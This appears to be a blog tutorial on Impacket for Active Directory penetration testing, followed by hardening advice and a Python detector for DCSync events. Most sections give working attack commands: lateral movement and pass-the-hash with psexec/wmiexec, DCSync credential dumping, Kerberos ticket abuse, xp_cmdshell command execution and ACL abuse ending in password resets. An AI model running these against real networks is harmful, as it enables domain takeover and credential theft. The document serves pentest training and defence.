Unlock Active Directory Dominance: Master Impacket’s Net Script for Advanced Pentesting + Video

Introduction:

Impacket is a powerful Python library that provides low-level programmatic access to core Windows network protocols such as SMB, RPC, LDAP, and Kerberos. For penetration testers and red teams, Impacket’s suite of tools—including psexec, wmiexec, secretsdump, and smbexec—enables sophisticated Active Directory (AD) attacks, lateral movement, and credential abuse, turning a single foothold into full domain compromise.

Learning Objectives:

  • Execute remote commands and lateral movement using Impacket’s SMB-based tools (psexec, wmiexec) across a Windows domain.
  • Dump NTDS.dit hashes and perform DCSync attacks to extract credential material from domain controllers.
  • Conduct Kerberos attacks such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT) to escalate privileges and maintain persistence.

You Should Know:

1. Installing Impacket on Linux and Windows

Impacket requires Python 3.6+ and is available via GitHub or pip. For Linux (Kali/Parrot/Ubuntu), use the following commands to install from source (recommended for the latest tools):

sudo apt update && sudo apt install python3-pip git -y
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .

For a quick installation via pip (slightly older version):

pip3 install impacket

On Windows, install Python 3, then open Command Prompt as Administrator:

pip install impacket

Verify installation by running any tool, e.g.:

psexec.py -h

Step‑by‑step: After installing, navigate to the `impacket/examples/` directory (if cloned) or simply call the scripts from anywhere in your PATH. Ensure firewall rules allow outbound SMB (port 445) and RPC (port 135) to target machines.

2. Lateral Movement with psexec and wmiexec

These tools allow remote command execution using valid credentials or NTLM hashes. Use `psexec.py` to upload a service and execute commands interactively:

psexec.py domain/user:password@target_ip

If you have an NTLM hash instead of a plaintext password (Pass-the-Hash), use:

psexec.py domain/user@target_ip -hashes :ntlm_hash

For a stealthier approach (no service binary written to disk), use wmiexec.py:

wmiexec.py domain/user:password@target_ip "cmd /c whoami"

Step‑by‑step:

  • Step 1: Obtain a set of domain credentials or an NTLM hash (e.g., from a compromised workstation).
  • Step 2: Identify a reachable target (e.g., a file server or a second workstation) using nmap -p445 <subnet>.
  • Step 3: Run `psexec.py` for an interactive shell or `wmiexec.py` for single commands.
  • Step 4: Use the resulting shell to enumerate further, dump credentials, or deploy persistence.

3. Credential Dumping: secretsdump and DCSync

`secretsdump.py` extracts password hashes from local SAM files, cached credentials, and NTDS.dit (domain database). Use it against a domain controller with sufficient privileges:

secretsdump.py domain/admin_user:password@dc_ip

To perform a DCSync attack (simulate a domain controller replicating hashes), use:

secretsdump.py domain/admin_user:password@dc_ip -just-dc-ntlm

Step‑by‑step:

  • Step 1: Obtain administrative privileges on any domain-joined machine or directly on the DC.
  • Step 2: Execute `secretsdump.py` with the target DC’s IP. The tool will attempt to use DRSUAPI (Directory Replication Service) to request all user hashes.
  • Step 3: Save the output (especially the `KRBTGT` hash and domain admin hashes) for offline cracking or PtH attacks.
  • Step 4: Use the extracted hashes to pivot to other systems using `psexec.py` or `wmiexec.py`.

4. Kerberos Attacks: Pass-the-Hash and Pass-the-Ticket

Impacket supports Kerberos authentication, enabling Pass-the-Ticket (PtT) attacks. First, extract a ticket from memory using Mimikatz or Rubeus on a compromised host. Then use `wmiexec.py` with the ticket file:

export KRB5CCNAME=/path/to/ticket.ccache
wmiexec.py -k domain/user@target_ip -no-pass

For Pass-the-Hash (PtH) against Kerberos-enabled services, use `psexec.py` with the `-hashes` flag as shown earlier, but note that PtH works over SMB (NTLM) rather than Kerberos. For a true Kerberos PtH, you can use `getTGT.py` to generate a ticket from a hash:

getTGT.py domain/user -hashes :ntlm_hash
export KRB5CCNAME=user.ccache

Step‑by‑step:

  • Step 1: Obtain a user’s NTLM hash (via secretsdump or Mimikatz).
  • Step 2: Use `getTGT.py` to request a Ticket Granting Ticket (TGT) from the KDC.
  • Step 3: Set the `KRB5CCNAME` environment variable to point to the saved ticket.
  • Step 4: Run Impacket tools with the `-k` option to authenticate via Kerberos, bypassing NTLM restrictions.

5. MSSQL Exploitation with Impacket

`mssqlclient.py` allows remote query execution, command execution via xp_cmdshell, and privilege escalation on MSSQL servers. Basic authentication:

mssqlclient.py domain/user:password@sql_server_ip

If you have administrative privileges, enable xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Then execute OS commands:

xp_cmdshell 'whoami > C:\temp\out.txt';

Step‑by‑step:

  • Step 1: Identify MSSQL instances (port 1433) using Nmap.
  • Step 2: Connect with `mssqlclient.py` using stolen credentials or hashes (supports NTLM authentication).
  • Step 3: Enumerate database roles—if `sysadmin` role is present, enable xp_cmdshell.
  • Step 4: Run commands to download payloads, add users, or dump credentials.

6. ACL Abuse and Privilege Escalation

Impacket’s `dacledit.py` and `owner.py` manipulate Active Directory access control lists (ACLs) to escalate privileges. For example, grant `GenericAll` rights over a target user:

dacledit.py -action write -delegate 'attacker_user' -target 'target_user' -rights GenericAll domain/user:password@dc_ip

Then change the target’s password using `smbpasswd.py`:

smbpasswd.py domain/attacker_user@dc_ip -newpass NewPass123 -oldpass oldpass

Step‑by‑step:

  • Step 1: Enumerate ACLs using `BloodHound` or `dacledit.py -action read`.
  • Step 2: Identify a misconfigured ACE (e.g., a user having `WriteProperty` on another user).
  • Step 3: Use `dacledit.py` to add `ForceChangePassword` or `GenericAll` rights for your attacker account.
  • Step 4: Change the target’s password or add a Kerberos resource-based constrained delegation.

7. Defensive Mitigations and Hardening

To defend against Impacket-based attacks, implement these hardening measures:
– Require SMB signing and enforce LDAP signing to prevent relay attacks. On Windows Domain Controllers, set `Domain controller: LDAP server signing requirements` to Require signing.
– Enable Windows Defender Credential Guard to protect NTLM hashes and Kerberos tickets from being dumped.
– Deploy Microsoft ATA (Advanced Threat Analytics) or Microsoft Defender for Identity to detect DCSync and Pass-the-Hash attempts.
– Use local administrator password solutions (LAPS) to randomize local admin passwords and prevent lateral movement with the same hash.
– Monitor for suspicious use of DRSUAPI: a Security Event ID 4662 whose Properties field contains the DS-Replication-Get-Changes control access rights, raised by an account that is not a domain controller, indicates a DCSync attack.
– Linux defenders: Block outbound SMB (port 445) and RPC (135, 49152-65535) from non‑Windows hosts. Use iptables:

sudo iptables -A OUTPUT -p tcp --dport 445 -j DROP
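As an added detection example (not part of the original post), the Python script below scans flattened Security event 4662 records for accounts that exercised the DS-Replication-Get-Changes control access rights without being a domain controller machine account. The three GUIDs are the well-known AD control access rights; the sample log lines, account names and the `MSOL_` allowlist prefix are constructed for illustration.

```python
import re

# Well-known AD control access right GUIDs a DCSync needs; a DC logs them in
# the Properties field of Security event 4662 when replication is requested.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample records (one flattened 4662/4624 event per line); the
# account names are made up and the GUID in the third line is an unrelated one.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=CORP "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=CORP "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_backup SubjectDomainName=CORP "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4662 SubjectUserName=MSOL_a1b2c3 SubjectDomainName=CORP "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4624 SubjectUserName=jdoe SubjectDomainName=CORP LogonType=3",
]

def find_dcsync(lines, allowlist=()):
    """Return (user, [rights]) for every 4662 record in which a non-DC account
    exercised replication rights. Machine accounts (name ends in '$') are
    skipped because DCs replicate with each other legitimately; allowlist holds
    name prefixes of known sync accounts (e.g. Azure AD Connect's MSOL_*)."""
    findings = []
    for line in lines:
        fields = dict(re.findall(r"(\w+)=(\S+)", line))
        if fields.get("EventID") != "4662":
            continue
        user = fields.get("SubjectUserName", "")
        # The replication GUIDs only occur in Properties, so scanning the whole
        # line for the known GUIDs is sufficient here.
        rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(line)
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights or user.endswith("$"):
            continue
        if any(user.upper().startswith(p.upper()) for p in allowlist):
            continue
        findings.append((user, rights))
    return findings

if __name__ == "__main__":
    for user, rights in find_dcsync(SAMPLE_EVENTS, allowlist=("MSOL_",)):
        print(f"ALERT possible DCSync by {user}: {', '.join(rights)}")
```

In production the same check is run against 4662 events exported from the domain controllers (for example via Windows Event Forwarding or a SIEM), with the allowlist maintained for legitimate replication accounts.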

What Undercode Say:

  • Key Takeaway 1: Impacket transforms a single compromised credential into full Active Directory compromise by providing atomic, scriptable tools for every major AD attack vector—lateral movement, credential dumping, and Kerberos abuse.
  • Key Takeaway 2: Defenders must shift from relying on perimeter security to active monitoring of protocol‑level anomalies, especially DRSUAPI replication requests and unusual SMB service creation, because Impacket’s low‑level approach bypasses traditional antivirus, and EDR often misses its benign‑looking Python execution.

Impacket is not just a toolset; it is a complete framework that mirrors how attackers think—by speaking native Windows protocols at a low level. Its popularity among red teams has forced a re-evaluation of Active Directory hardening: pass‑the‑hash is still viable because many organisations neglect to enable SMB signing or Credential Guard. Meanwhile, DCSync remains the gold standard for extracting all domain hashes in seconds. For blue teams, the only reliable detection is at the network layer—looking for DCE/RPC calls for DRSUAPI or service creation requests on the fly. Training courses that incorporate Impacket labs give defenders hands‑on exposure to these techniques, making the difference between theoretical knowledge and practical incident response.

Prediction:

As hybrid and cloud‑joined environments expand, Impacket will evolve to support cloud‑based identity providers (Azure AD, AWS Managed AD) with similar protocol abuse techniques. We will see Impacket forks that integrate with Graph API and OAuth token manipulation, blurring the line between on‑prem AD and cloud identity attacks. Consequently, Microsoft and other vendors will be forced to release native Linux tools for monitoring and blocking these protocol interactions, shifting the cybersecurity arms race into a new era of cross‑platform detection and response.

Reported By: Activedirectory Impacket – Hackers Feeds